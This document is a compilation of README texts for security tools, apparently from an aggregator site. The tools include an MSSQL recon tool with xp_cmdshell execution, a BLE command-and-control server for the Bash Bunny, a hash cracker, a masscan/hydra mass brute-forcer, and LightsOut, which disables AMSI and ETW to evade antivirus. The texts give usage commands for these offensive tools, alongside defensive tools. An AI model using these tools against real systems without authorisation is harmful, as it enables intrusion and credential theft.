query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or used in certain PySQLRecon commands (query
, tables
, columns
rows
), with the --database
flag.
Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link
flag.
Impersonate a user account while running a PySQLRecon command with the --impersonate
flag.
--link
and --impersonate
and incompatible.
pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in resources
MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface
, -i
: Specify the network interface.--random
, -r
: Set a random MAC address.--newmac
, -nm
: Set a specific MAC address.--customoui
, -co
: Set a custom OUI for the MAC address.--reset
, -rs
: Reset MAC address to the original value.--version
, -V
: Show the version of the program.$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the networksherlock.cfg
file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
target
: The target IP address(es), IP range, or CIDR block to scan.-p
, --ports
: Ports to scan (e.g., 1-1000, 22,80,443).-t
, --threads
: Number of threads to use.-P
, --protocol
: Protocol to use for scanning (tcp or udp).-V
, --version-info
: Obtain version information during banner grabbing.-s
, --save-results
: Save results to the specified file.-c
, --ping-check
: Perform a ping check before scanning.--use-shodan
: Enable Shodan integration.Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions are welcome! To contribute to NetworkSherlock, follow these steps:
py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.
Via pip
pip install pyamsi
Clone repository
git clone https://github.com/Tomiwa-Ot/py-amsi.git
cd py-amsi/
python setup.py install
from pyamsi import Amsi
# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default
# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default
# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level | Meaning |
---|---|
0 | AMSI_RESULT_CLEAN (File is clean) |
1 | AMSI_RESULT_NOT_DETECTED (No threat detected) |
16384 | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator) |
20479 | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator) |
32768 | AMSI_RESULT_DETECTED (File is considered malware) |
https://tomiwa-ot.github.io/py-amsi/index.html
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.
pip install pygatt "pygatt[GATTTOOL]"
Make sure BlueZ is installed and gatttool
is usable
sudo apt install bluez
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
sudo python c2-server.py
BlueBunny/payload.txt
).localhost:1472
and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.
PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β
Clone the repository:
git clone https://github.com/HalilDeniz/PassBreaker.git
Install the required dependencies:
pip install -r requirements.txt
python passbreaker.py <password_hash> <wordlist_file> [--algorithm]
Replace <password_hash>
with the target password hash and <wordlist_file>
with the path to the wordlist file containing potential passwords.
--algorithm <algorithm>
: Specify the hash algorithm to use (e.g., md5, sha256, sha512).-s, --salt <salt>
: Specify a salt value to use.-p, --parallel
: Enable parallel processing for faster cracking.-c, --complexity
: Evaluate password complexity before cracking.-b, --brute-force
: Perform a brute force attack.--min-length <min_length>
: Set the minimum password length for brute force attacks.--max-length <max_length>
: Set the maximum password length for brute force attacks.--character-set <character_set>
: Set the character set to use for brute force attacks.Elbette! Δ°Εte Δ°ngilizce olarak yazΔ±lmΔ±Ε baΕlΔ±k ve küçük bir bilgi ile daha fazla kullanΔ±m ΓΆrneΔi:
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5
This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123
This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity
This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123
This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.
python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel
This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.
These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.
This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.
Contributions are welcome! To contribute to PassBreaker, follow these steps:
If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:
PassBreaker is released under the MIT License. See LICENSE for more information.
T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL) together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module performs the communication with the specific module (Discord, Slack, Telegram, etc.) that allows the events to present the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".
To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.
To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip
, you can skip to the last step!
# Python 3.6+ required
python -m venv .venv # We will create a python virtual environment
source .venv/bin/activate # Let's get inside it
pip install -U pip # Upgrade pip
Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:
pip install "T3SF[Discord]" # Install the framework to work with Discord
or
pip install "T3SF[Slack]" # Install the framework to work with Slack
This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.
We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:
We created this framework to simplify all your work!
$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack
Inside your .env
file you have to provide the SLACK_BOT_TOKEN
and SLACK_APP_TOKEN
tokens. Read more about it here.
There is another environment variable to set, MSEL_PATH
. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json
. If you change the mount location of the volume then also change the variable.
$ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord
Inside your .env
file you have to provide the DISCORD_TOKEN
token. Read more about it here.
There is another environment variable to set, MSEL_PATH
. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json
. If you change the mount location of the volume then also change the variable.
Once you have everything ready, use our template for the main.py
, or modify the following code:
Here is an example if you want to run the framework with the Discord
bot and a GUI
.
from T3SF import T3SF
import asyncio
async def main():
await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)
if __name__ == '__main__':
asyncio.run(main())
Or if you prefer to run the framework without GUI
and with Slack
instead, you can modify the arguments, and that's it!
Yes, that simple!
await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)
If you need more help, you can always check our documentation here!
Mass bruteforce network protocols
Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.
masscan
(faster than nmap) to find alive hosts with common ports from network segment.masscan
result.hydra
commands to automatically bruteforce supported network services on devices.Kali linux
or any preferred linux distributionPython 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter
# Install required tools for the script
apt update && apt install seclists masscan hydra
Private ip range :
10.0.0.0/8
,192.168.0.0/16
,172.16.0.0/12
Save masscan results under ./result/masscan/
, with the format masscan_<name>.<ext>
Ex: masscan_192.168.0.0-16.txt
Example command:
masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt
Example Resume Command:
masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt
Command Options
βββ(rootγΏroot)-[~/mass-bruter]
ββ# python3 mass_bruteforce.py
Usage: [OPTIONS]
Mass Bruteforce Script
Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.
Quick Bruteforce Example:
python3 mass_bruteforce.py -q -f ~/masscan_script.txt
Fetch cracked credentials:
python3 mass_bruteforce.py -s
dpl4hydra
Any contributions are welcomed!
CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
safe_to_apply_score
, risk_score
, over_privilege_score
. Each score serves a different purpose. For safe_to_apply_score
identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml
config file.Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml
, ~/.CureIAM.yaml
, ~/CureIAM.yaml
, or CureIAM.yaml
and there is Service account JSON file present in current directory with name preferably cureiamSA.json
. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run CureIAM process as schedular
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image, as schedular
$ docker run -d cureiam
# Run the image now
$ docker run -f cureiam -m cureiam -n
CureIAM.yaml
configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.
logger:
version: 1
disable_existing_loggers: false
formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"
handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple
file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5
loggers:
adal-python:
level: INFO
root:
level: INFO
handlers:
- rich_console
- file
schedule: "16:00"
This subsection of config uses, Rich
logging module and schedules CureIAM to run daily at 16:00
.
plugins
section in CureIAM.yaml
. You can think of this section as declaration for different plugins. plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json
filestore:
plugin: CureIAM.plugins.files.filestore.FileStore
gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_scor e_group: 0
min_safe_to_apply_score_SA: 50
esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword
Each of these plugins declaration has to be of this form:
plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2
For example, for plugins CureIAM.stores.esstore.EsStore
which is this file and class EsStore
. All the params which are defined in yaml has to match the declaration in __init__()
function of the same plugin class.
audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore
Multiple Audits can be created out of this. The one created here is named IAMAudit
with three plugins in use, gcpCloud
, gcpIamProcessor
, filestores
and esstore
. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.
CureIAM
to run the Audits defined in previous step. run:
- IAMAudits
And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.
The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
<>
=============
Adding the version in library to avoid any back compatibility issues.
Running docker compose: docker-compose -f docker_compose_es.yaml up
mode_scan: true
mode_enforce: false
MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory regionβs characteristics:
The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
Furthermore, the tool features the following options:
python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for spcefic loaded DLL
The script needs administrator privileges in order incepect all processes.
LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
LightsOut is designed to work on Linux systems with python3
and mingw-w64
installed. No other dependencies are required.
Features currently include:
_______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]
Generate an obfuscated DLL that will disable AMSI & ETW
options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox < ;option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to
Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch
Intended Use/Opsec Considerations
This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.
Usage Examples
You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:
Or even easier, copy powershell to an arbitrary location and side load the DLL!
Greetz/Credit/Further Reference:
During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:
1- Download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose :
docker-compose up -d
3- Run script.py script
docker-compose exec web python script.py
4 - Now go to http://:8000/search and enjoy the search engine
1- download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Setup virtual environment :
python3 -m venv myenv
source myenv/bin/activate
3- Install requirements.txt file :
pip install -r requirements.txt
4- run an instance of elasticsearch using docker :
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- update script.py and settings file to the host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)
as an example searching for .mil data gives:
searching for tesla as en example gives :
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.
Before installing JSpector, you need to have Jython installed on Burp Suite.
Extensions
tab.Add
button in the Installed
tab.Extension Details
dialog box, select Python
as the Extension Type
.Select file
button and navigate to the JSpector.py
.Next
button.Close
button.Dashboard
tab.